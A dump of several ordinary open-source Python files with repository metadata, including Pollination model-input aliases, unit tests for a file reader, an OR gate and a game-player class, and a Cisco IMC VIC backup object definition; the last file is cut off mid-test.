| 46.183333 | 170 | 0.665464 | 450 | 2,771 | 3.975556 | 0.095556 | 0.135271 | 0.332029 | 0.250419 | 0.939072 | 0.921185 | 0.921185 | 0.9128 | 0.806596 | 0.806596 | 0 | 0.060447 | 0.17611 | 2,771 | 59 | 171 | 46.966102 | 0.723171 | 0 | 0 | 0.295455 | 0 | 0 | 0.079394 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.045455 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
229c41f747096dd4e184d04a233ecda03e63f089 | 6,462 | py | Python | pollination/alias/inputs/model.py | mostaphaRoudsari/pollination-alias | 511fcb466a9b16eacf079c3f859c0d4805ecd68d | [
"Apache-2.0"
] | 1 | 2021-05-19T12:51:14.000Z | 2021-05-19T12:51:14.000Z | pollination/alias/inputs/model.py | mostaphaRoudsari/pollination-alias | 511fcb466a9b16eacf079c3f859c0d4805ecd68d | [
"Apache-2.0"
] | 45 | 2021-02-05T21:08:08.000Z | 2022-03-09T00:17:32.000Z | pollination/alias/inputs/model.py | mostaphaRoudsari/pollination-alias | 511fcb466a9b16eacf079c3f859c0d4805ecd68d | [
"Apache-2.0"
] | 4 | 2021-02-05T18:39:46.000Z | 2021-05-18T19:37:54.000Z | from pollination_dsl.alias import InputAlias
from queenbee.io.common import IOAliasHandler
"""Alias inputs that expect a HBJSON model file as the recipe input."""
hbjson_model_input = [
# grasshopper Alias
InputAlias.any(
name='model',
description='A Honeybee Model to simulate or the path to a HBJSON file '
'of a Model. This can also be the path to a HBpkl file, though this is only '
'recommended for cases where the model is extremely large.',
platform=['grasshopper'],
handler=[
IOAliasHandler(
language='python', module='pollination_handlers.inputs.model',
function='model_to_json'
),
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='HBModelToJSON'
)
]
),
# Rhino alias
InputAlias.linked(
name='model',
description='This input links the model to Rhino model.',
platform=['rhino'],
handler=[
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='RhinoHBModelToJSON'
)
]
)
]
"""Alias inputs that expect a HBJSON model with sensor grids."""
hbjson_model_grid_input = [
# grasshopper Alias
InputAlias.any(
name='model',
description='A Honeybee Model to simulate or the path to a HBJSON file '
'of a Model. This can also be the path to a HBpkl file, though this is only '
'recommended for cases where the model is extremely large. Note that this '
'model should have sensor grids assigned to it.',
platform=['grasshopper'],
handler=[
IOAliasHandler(
language='python', module='pollination_handlers.inputs.model',
function='model_to_json_grid_check'
),
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='HBModelToJSON'
)
]
),
# Rhino alias
InputAlias.linked(
name='model',
description='This input links the model to Rhino model.',
platform=['rhino'],
handler=[
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='RhinoHBModelToJSON'
)
]
)
]
"""Alias inputs that expect a HBJSON model with sensor grids and rooms."""
hbjson_model_grid_room_input = [
# grasshopper Alias
InputAlias.any(
name='model',
description='A Honeybee Model to simulate or the path to a HBJSON file '
'of a Model. Note that this model must contain rooms and have sensor '
'grids assigned to it.',
platform=['grasshopper'],
handler=[
IOAliasHandler(
language='python', module='pollination_handlers.inputs.model',
function='model_to_json_grid_room_check'
),
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='HBModelToJSON'
)
]
),
# Rhino alias
InputAlias.linked(
name='model',
description='This input links the model to Rhino model.',
platform=['rhino'],
handler=[
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='RhinoHBModelToJSON'
)
]
)
]
"""Alias inputs that expect a HBJSON model with views."""
hbjson_model_view_input = [
# grasshopper Alias
InputAlias.any(
name='model',
description='A Honeybee Model to simulate or the path to a HBJSON file '
'of a Model. This can also be the path to a HBpkl file, though this is only '
'recommended for cases where the model is extremely large. Note that this '
'model should have views assigned to it.',
platform=['grasshopper'],
handler=[
IOAliasHandler(
language='python', module='pollination_handlers.inputs.model',
function='model_to_json_view_check'
),
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='HBModelToJSON'
)
]
),
# Rhino alias
InputAlias.linked(
name='model',
description='This input links the model to Rhino model.',
platform=['rhino'],
handler=[
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='RhinoHBModelToJSON'
)
]
)
]
"""Alias inputs that expect a HBJSON model with views."""
hbjson_model_view_input = [
# grasshopper Alias
InputAlias.any(
name='model',
description='A Honeybee Model to simulate or the path to a HBJSON file '
'of a Model. This can also be the path to a HBpkl file, though this is only '
'recommended for cases where the model is extremely large. Note that this '
'model should have views assigned to it.',
platform=['grasshopper'],
handler=[
IOAliasHandler(
language='python', module='pollination_handlers.inputs.model',
function='model_to_json_view_check'
),
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='HBModelToJSON'
)
]
),
# Rhino alias
InputAlias.linked(
name='model',
description='This input links the model to Rhino model.',
platform=['rhino'],
handler=[
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='RhinoHBModelToJSON'
)
]
)
]
"""Alias inputs that expect a DFJSON model file as the recipe input."""
dfjson_model_input = [
# grasshopper Alias
InputAlias.any(
name='model',
description='A Dragonfly Model object or the path to a DFJSON file.',
platform=['grasshopper'],
handler=[
IOAliasHandler(
language='python', module='pollination_handlers.inputs.model',
function='model_dragonfly_to_json'
)
]
)
]
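# Hedged sketch (added): a minimal alias list following the exact pattern used
# throughout this module. The 'model_to_osm' handler function is hypothetical;
# everything else reuses the real InputAlias/IOAliasHandler constructors
# imported at the top of the file.
osm_model_input = [
    # grasshopper Alias
    InputAlias.any(
        name='model',
        description='Hypothetical example input for an OSM model file.',
        platform=['grasshopper'],
        handler=[
            IOAliasHandler(
                language='python', module='pollination_handlers.inputs.model',
                function='model_to_osm'  # hypothetical function name
            )
        ]
    )
]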
| 32.80203 | 85 | 0.579542 | 634 | 6,462 | 5.834385 | 0.126183 | 0.095161 | 0.059476 | 0.027034 | 0.939443 | 0.936199 | 0.924034 | 0.915112 | 0.915112 | 0.915112 | 0 | 0 | 0.330238 | 6,462 | 196 | 86 | 32.969388 | 0.854667 | 0.025843 | 0 | 0.708333 | 0 | 0 | 0.394804 | 0.09713 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.011905 | 0 | 0.011905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
22d8d23b868c37ca36f49ee778e4a2df0d62b94b | 4,623 | py | Python | test_file_reader.py | baillielab/maic | c0a91045554b1a81a4f715fbc4ef4dd8cadbba2c | [
"MIT"
] | 4 | 2020-01-15T16:17:40.000Z | 2022-02-14T10:38:56.000Z | test_file_reader.py | baillielab/maic | c0a91045554b1a81a4f715fbc4ef4dd8cadbba2c | [
"MIT"
] | 1 | 2020-02-07T15:20:41.000Z | 2020-02-13T11:38:31.000Z | test_file_reader.py | baillielab/maic | c0a91045554b1a81a4f715fbc4ef4dd8cadbba2c | [
"MIT"
] | null | null | null | from unittest import TestCase, main
import mock
from file_reader import FileReader
class TestFileReader(TestCase):
def test_file_reader_has_zero_lines_by_default(self):
"""Check that the FileReader has no data in the list_lines attribute"""
test_object = FileReader()
self.assertFalse(test_object.list_lines,
"list_lines should be empty by default")
@mock.patch('file_reader.io.open', create=True)
def test_file_is_open_and_read(self, mocked_open):
"""
Check that a file is read and the data added to the list_lines
attribute
"""
mocked_open.side_effect = [
mock.mock_open(read_data="Category\tName\tRANKED\tG1\tG2\r"
"CRLF\r\n"
"LF\n"
"No end of file")
.return_value
]
__file_path = "Path to File"
test_object = FileReader()
test_object.read_file(__file_path)
mocked_open.assert_called_with(__file_path, "r")
self.assertEqual(4, len(test_object.list_lines),
"Should be 4 items in the list")
@mock.patch('file_reader.io.open', create=True)
def test_five_hyphens_at_start_ends_read(self, mocked_open):
"""
Check that a file is read and the data added to the list_lines
attribute, stopping reading when we see a line that starts with '-----'
"""
mocked_open.side_effect = [
mock.mock_open(
read_data="CR\rCRLF\r\n-----LF\nNo end of file"
).return_value
]
__file_path = "Path to File"
test_object = FileReader()
test_object.read_file(__file_path)
mocked_open.assert_called_with(__file_path, "r")
self.assertEqual(2, len(test_object.list_lines),
"Should be 2 items in the list")
@mock.patch('file_reader.io.open', create=True)
def test_hash_at_start_skips_line(self, mocked_open):
"""
Check that a file is read and the data added to the list_lines
attribute, ignoring lines that start with '#'
"""
mocked_open.side_effect = [
mock.mock_open(
read_data="#CR\rCRLF\r\n# LF\nNo end of file"
).return_value
]
__file_path = "Path to File"
test_object = FileReader()
test_object.read_file(__file_path)
mocked_open.assert_called_with(__file_path, "r")
self.assertEqual(2, len(test_object.list_lines),
"Should be 2 items in the list")
@mock.patch('file_reader.io.open', create=True)
def test_blank_lines_are_safely_ignored(self, mocked_open):
"""
Check that a file is read and the data added to the list_lines
attribute, ignoring any blank lines
"""
mocked_open.side_effect = [
mock.mock_open(read_data="Category\tName\tRANKED\tG1\tG2\r"
"CRLF\r\n"
"\n"
"LF\n"
"\n"
"No end of file")
.return_value
]
__file_path = "Path to File"
test_object = FileReader()
test_object.read_file(__file_path)
mocked_open.assert_called_with(__file_path, "r")
self.assertEqual(4, len(test_object.list_lines),
"Should be 4 items in the list")
@mock.patch('file_reader.io.open', create=True)
def test_whitespace_lines_are_safely_ignored(self, mocked_open):
"""
Check that a file is read and the data added to the list_lines
attribute, ignoring any lines that are solely whitespace
"""
mocked_open.side_effect = [
mock.mock_open(read_data="Category\tName\tRANKED\tG1\tG2\r"
"CRLF\r\n"
"\t\t\n"
" \n"
"LF\n"
"\n"
"No end of file")
.return_value
]
__file_path = "Path to File"
test_object = FileReader()
test_object.read_file(__file_path)
mocked_open.assert_called_with(__file_path, "r")
self.assertEqual(4, len(test_object.list_lines),
"Should be 4 items in the list")
if __name__ == '__main__':
main()
| 38.848739 | 79 | 0.547696 | 559 | 4,623 | 4.221825 | 0.171735 | 0.072034 | 0.022881 | 0.05339 | 0.806356 | 0.806356 | 0.806356 | 0.806356 | 0.806356 | 0.806356 | 0 | 0.005461 | 0.366212 | 4,623 | 118 | 80 | 39.177966 | 0.8 | 0.130002 | 0 | 0.744186 | 0 | 0 | 0.157472 | 0.030821 | 0 | 0 | 0 | 0 | 0.127907 | 1 | 0.069767 | false | 0 | 0.034884 | 0 | 0.116279 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a3b76014633a352d093cd93ebeca5a3220b63fb2 | 7,442 | py | Python | imcsdk/mometa/vic/VicBackupAll.py | ecoen66/imcsdk | b10eaa926a5ee57cea7182ae0adc8dd1c818b0ab | [
"Apache-2.0"
] | 31 | 2016-06-14T07:23:59.000Z | 2021-09-12T17:17:26.000Z | imcsdk/mometa/vic/VicBackupAll.py | sthagen/imcsdk | 1831eaecb5960ca03a8624b1579521749762b932 | [
"Apache-2.0"
] | 109 | 2016-05-25T03:56:56.000Z | 2021-10-18T02:58:12.000Z | imcsdk/mometa/vic/VicBackupAll.py | sthagen/imcsdk | 1831eaecb5960ca03a8624b1579521749762b932 | [
"Apache-2.0"
] | 67 | 2016-05-17T05:53:56.000Z | 2022-03-24T15:52:53.000Z | """This module contains the general information for VicBackupAll ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class VicBackupAllConsts:
ADMIN_STATE_TRIGGER = "trigger"
ADMIN_STATE_TRIGGERED = "triggered"
PROTO_FTP = "ftp"
PROTO_HTTP = "http"
PROTO_NONE = "none"
PROTO_SCP = "scp"
PROTO_SFTP = "sftp"
PROTO_TFTP = "tftp"
class VicBackupAll(ManagedObject):
"""This is VicBackupAll class."""
consts = VicBackupAllConsts()
naming_props = set([])
mo_meta = {
"classic": MoMeta("VicBackupAll", "vicBackupAll", "vic-all-exportconfig", VersionMeta.Version303a, "InputOutput", 0x3ff, [], ["admin", "read-only", "user"], ['topSystem'], [], ["Get", "Set"]),
"modular": MoMeta("VicBackupAll", "vicBackupAll", "vic-all-exportconfig", VersionMeta.Version303a, "InputOutput", 0x3ff, [], ["admin", "read-only", "user"], ['equipmentChassis'], [], ["Get", "Set"])
}
prop_meta = {
"classic": {
"admin_state": MoPropertyMeta("admin_state", "adminState", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x2, None, None, None, ["trigger", "triggered"], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"hostname": MoPropertyMeta("hostname", "hostname", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, r"""(([0-9A-Fa-f]{1,4}:([0-9A-Fa-f]{1,4}:([0-9A-Fa-f]{1,4}:([0-9A-Fa-f]{1,4}:([0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{0,4}|:[0-9A-Fa-f]{1,4})?|(:[0-9A-Fa-f]{1,4}){0,2})|(:[0-9A-Fa-f]{1,4}){0,3})|(:[0-9A-Fa-f]{1,4}){0,4})|:(:[0-9A-Fa-f]{1,4}){0,5})((:[0-9A-Fa-f]{1,4}){2}|:(25[0-5]|(2[0-4]|1[0-9]|[1-9])?[0-9])(\.(25[0-5]|(2[0-4]|1[0-9]|[1-9])?[0-9])){3})|(([0-9A-Fa-f]{1,4}:){1,6}|:):[0-9A-Fa-f]{0,4}|([0-9A-Fa-f]{1,4}:){7}:) |((([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,6})|(([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?)+)|([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5]))""", [], []),
"proto": MoPropertyMeta("proto", "proto", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["ftp", "http", "none", "scp", "sftp", "tftp"], []),
"pwd": MoPropertyMeta("pwd", "pwd", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x20, 0, 255, None, [], []),
"remote_file": MoPropertyMeta("remote_file", "remoteFile", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x40, 0, 255, r"""[^\(\)~`'\?\\"";<>\|&\*\^$%]{1,255}""", [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x80, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x100, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"user": MoPropertyMeta("user", "user", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x200, 0, 255, None, [], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version303a, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"descr": MoPropertyMeta("descr", "descr", "string", VersionMeta.Version303a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"progress": MoPropertyMeta("progress", "progress", "string", VersionMeta.Version303a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
},
"modular": {
"admin_state": MoPropertyMeta("admin_state", "adminState", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x2, None, None, None, ["trigger", "triggered"], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"hostname": MoPropertyMeta("hostname", "hostname", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, r"""(([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,6})|(([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?)+)|(https?://)?([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])""", [], []),
"proto": MoPropertyMeta("proto", "proto", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["ftp", "http", "none", "scp", "sftp", "tftp"], []),
"pwd": MoPropertyMeta("pwd", "pwd", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x20, 0, 255, None, [], []),
"remote_file": MoPropertyMeta("remote_file", "remoteFile", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x40, 0, 255, r"""[^\(\)~`'\?\\"";<>\|&\*\^$%]{1,255}""", [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x80, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x100, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"user": MoPropertyMeta("user", "user", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x200, 0, 255, None, [], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version303a, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"descr": MoPropertyMeta("descr", "descr", "string", VersionMeta.Version303a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"progress": MoPropertyMeta("progress", "progress", "string", VersionMeta.Version303a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
},
}
prop_map = {
"classic": {
"adminState": "admin_state",
"dn": "dn",
"hostname": "hostname",
"proto": "proto",
"pwd": "pwd",
"remoteFile": "remote_file",
"rn": "rn",
"status": "status",
"user": "user",
"childAction": "child_action",
"descr": "descr",
"progress": "progress",
},
"modular": {
"adminState": "admin_state",
"dn": "dn",
"hostname": "hostname",
"proto": "proto",
"pwd": "pwd",
"remoteFile": "remote_file",
"rn": "rn",
"status": "status",
"user": "user",
"childAction": "child_action",
"descr": "descr",
"progress": "progress",
},
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.admin_state = None
self.hostname = None
self.proto = None
self.pwd = None
self.remote_file = None
self.status = None
self.user = None
self.child_action = None
self.descr = None
self.progress = None
ManagedObject.__init__(self, "VicBackupAll", parent_mo_or_dn, **kwargs)
| 65.280702 | 890 | 0.565305 | 938 | 7,442 | 4.407249 | 0.119403 | 0.019352 | 0.162554 | 0.243832 | 0.825109 | 0.816401 | 0.814465 | 0.807934 | 0.807934 | 0.805273 | 0 | 0.081148 | 0.1853 | 7,442 | 113 | 891 | 65.858407 | 0.600693 | 0.013975 | 0 | 0.543478 | 0 | 0.021739 | 0.334289 | 0.155201 | 0 | 0 | 0.01092 | 0 | 0 | 1 | 0.01087 | false | 0 | 0.032609 | 0 | 0.206522 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a3f87df2b7692a360dd7fc929f31afabbf315a16 | 48 | py | Python | skforecast/ForecasterAutoreg/__init__.py | JoaquinAmatRodrigo/skforecaster | 3ab526d63bbb94ae4bd18ae964197042a675a34a | [
"MIT"
] | 86 | 2021-02-25T08:56:45.000Z | 2022-03-31T01:33:53.000Z | skforecast/ForecasterAutoreg/__init__.py | hdiazsqlr/skforecast | 5ee79a51960a27db9e169706014528eae403e1c2 | [
"MIT"
] | 5 | 2021-11-30T22:30:45.000Z | 2022-03-29T10:21:36.000Z | skforecast/ForecasterAutoreg/__init__.py | hdiazsqlr/skforecast | 5ee79a51960a27db9e169706014528eae403e1c2 | [
"MIT"
] | 24 | 2021-04-04T09:58:26.000Z | 2022-03-09T15:55:44.000Z | from .ForecasterAutoreg import ForecasterAutoreg | 48 | 48 | 0.916667 | 4 | 48 | 11 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 48 | 1 | 48 | 48 | 0.977778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
432188f233f91e7ce20cc93d465f74389ddd0f31 | 2,659 | py | Python | tests/gate/test_ORGate4.py | jamesjiang52/Bitwise | c71f151d23034b3f9e2a939f637be0eaa16c45c3 | [
"MIT"
] | null | null | null | tests/gate/test_ORGate4.py | jamesjiang52/Bitwise | c71f151d23034b3f9e2a939f637be0eaa16c45c3 | [
"MIT"
] | null | null | null | tests/gate/test_ORGate4.py | jamesjiang52/Bitwise | c71f151d23034b3f9e2a939f637be0eaa16c45c3 | [
"MIT"
] | null | null | null | import bitwise as bw
class TestORGate4:
def test_ORGate4(self):
input_1 = bw.wire.Wire()
input_2 = bw.wire.Wire()
input_3 = bw.wire.Wire()
input_4 = bw.wire.Wire()
output = bw.wire.Wire()
a = bw.gate.ORGate4(input_1, input_2, input_3, input_4, output)
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 0
assert output.value == 0
input_1.value = 0
input_2.value = 0
input_3.value = 0
input_4.value = 1
assert output.value == 1
input_1.value = 0
input_2.value = 0
input_3.value = 1
input_4.value = 0
assert output.value == 1
input_1.value = 0
input_2.value = 0
input_3.value = 1
input_4.value = 1
assert output.value == 1
input_1.value = 0
input_2.value = 1
input_3.value = 0
input_4.value = 0
assert output.value == 1
input_1.value = 0
input_2.value = 1
input_3.value = 0
input_4.value = 1
assert output.value == 1
input_1.value = 0
input_2.value = 1
input_3.value = 1
input_4.value = 0
assert output.value == 1
input_1.value = 0
input_2.value = 1
input_3.value = 1
input_4.value = 1
assert output.value == 1
input_1.value = 1
input_2.value = 0
input_3.value = 0
input_4.value = 0
assert output.value == 1
input_1.value = 1
input_2.value = 0
input_3.value = 0
input_4.value = 1
assert output.value == 1
input_1.value = 1
input_2.value = 0
input_3.value = 1
input_4.value = 0
assert output.value == 1
input_1.value = 1
input_2.value = 0
input_3.value = 1
input_4.value = 1
assert output.value == 1
input_1.value = 1
input_2.value = 1
input_3.value = 0
input_4.value = 0
assert output.value == 1
input_1.value = 1
input_2.value = 1
input_3.value = 0
input_4.value = 1
assert output.value == 1
input_1.value = 1
input_2.value = 1
input_3.value = 1
input_4.value = 0
assert output.value == 1
input_1.value = 1
input_2.value = 1
input_3.value = 1
input_4.value = 1
assert output.value == 1
print(a.__doc__)
print(a)
a(input_1=0, input_2=0, input_3=0, input_4=0, output=None)
assert output.value == 0
| 23.121739 | 71 | 0.520496 | 391 | 2,659 | 3.332481 | 0.063939 | 0.216424 | 0.320798 | 0.207214 | 0.80967 | 0.80967 | 0.80967 | 0.80967 | 0.80967 | 0.80967 | 0 | 0.101422 | 0.391877 | 2,659 | 114 | 72 | 23.324561 | 0.704391 | 0 | 0 | 0.870968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.182796 | 1 | 0.010753 | false | 0 | 0.010753 | 0 | 0.032258 | 0.021505 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
433f5b7353c932a38fee5f33b1eaee5c6eebf5b5 | 51 | py | Python | class2/run_from_here/ex1_top.py | patrebert/pynet_cert | b82cce3ddb20d9e4abc89d74579ddeb3513bdf55 | [
"Apache-2.0"
] | null | null | null | class2/run_from_here/ex1_top.py | patrebert/pynet_cert | b82cce3ddb20d9e4abc89d74579ddeb3513bdf55 | [
"Apache-2.0"
] | null | null | null | class2/run_from_here/ex1_top.py | patrebert/pynet_cert | b82cce3ddb20d9e4abc89d74579ddeb3513bdf55 | [
"Apache-2.0"
] | null | null | null | #!/bin/env python
import my_func
my_func.my_func()
| 12.75 | 17 | 0.764706 | 10 | 51 | 3.6 | 0.6 | 0.5 | 0.444444 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098039 | 51 | 3 | 18 | 17 | 0.782609 | 0.313725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
4a3b74c44dad04940f6f3ce24811a65a64dc4c90 | 220 | py | Python | ichnaea/data/__init__.py | crankycoder/ichnaea | fb54000e92c605843b7a41521e36fd648c11ae94 | [
"Apache-2.0"
] | 1 | 2019-05-12T05:51:19.000Z | 2019-05-12T05:51:19.000Z | ichnaea/data/__init__.py | crankycoder/ichnaea | fb54000e92c605843b7a41521e36fd648c11ae94 | [
"Apache-2.0"
] | null | null | null | ichnaea/data/__init__.py | crankycoder/ichnaea | fb54000e92c605843b7a41521e36fd648c11ae94 | [
"Apache-2.0"
] | null | null | null | """
Contains asynchronous tasks and data pipeline logic.
"""
from ichnaea import config
def _cell_export_enabled():
return bool(config.ASSET_BUCKET)
def _web_content_enabled():
return bool(config.MAP_TOKEN)
| 15.714286 | 52 | 0.759091 | 29 | 220 | 5.482759 | 0.793103 | 0.163522 | 0.213836 | 0.289308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154545 | 220 | 13 | 53 | 16.923077 | 0.854839 | 0.236364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | true | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
4a887a79ec4552c6b2c32c83eaebcf0fa394a3b1 | 4,123 | py | Python | edr/tests/test_edplayerone.py | blacksurgeon/edr | 809b30a0247961f6b92a968696afa4383c867b5e | [
"Apache-2.0"
] | 74 | 2018-01-30T10:44:20.000Z | 2022-03-24T23:13:30.000Z | edr/tests/test_edplayerone.py | blacksurgeon/edr | 809b30a0247961f6b92a968696afa4383c867b5e | [
"Apache-2.0"
] | 329 | 2017-11-20T12:18:21.000Z | 2022-03-31T22:21:49.000Z | edr/tests/test_edplayerone.py | blacksurgeon/edr | 809b30a0247961f6b92a968696afa4383c867b5e | [
"Apache-2.0"
] | 15 | 2018-02-08T09:22:46.000Z | 2022-03-27T13:05:54.000Z | import config_tests
from unittest import TestCase, main
from edentities import EDPlayerOne
import edvehicles
class TestEDPlayerOne(TestCase):
def test_in_solo_private(self):
cmdr = EDPlayerOne()
self.assertFalse(cmdr.in_solo_or_private())
cmdr = EDPlayerOne()
cmdr.game_mode = ""
self.assertFalse(cmdr.in_solo_or_private())
cmdr = EDPlayerOne()
cmdr.game_mode = "dummy"
self.assertFalse(cmdr.in_solo_or_private())
cmdr = EDPlayerOne()
cmdr.game_mode = "Open"
self.assertFalse(cmdr.in_solo_or_private())
cmdr = EDPlayerOne()
cmdr.game_mode = "Solo"
self.assertTrue(cmdr.in_solo_or_private())
cmdr = EDPlayerOne()
cmdr.game_mode = "Group"
self.assertTrue(cmdr.in_solo_or_private())
cmdr = EDPlayerOne()
cmdr.game_mode = "solo"
self.assertFalse(cmdr.in_solo_or_private())
cmdr = EDPlayerOne()
cmdr.game_mode = "group"
self.assertFalse(cmdr.in_solo_or_private())
def test_in_open(self):
cmdr = EDPlayerOne()
self.assertFalse(cmdr.in_open())
cmdr = EDPlayerOne()
cmdr.game_mode = ""
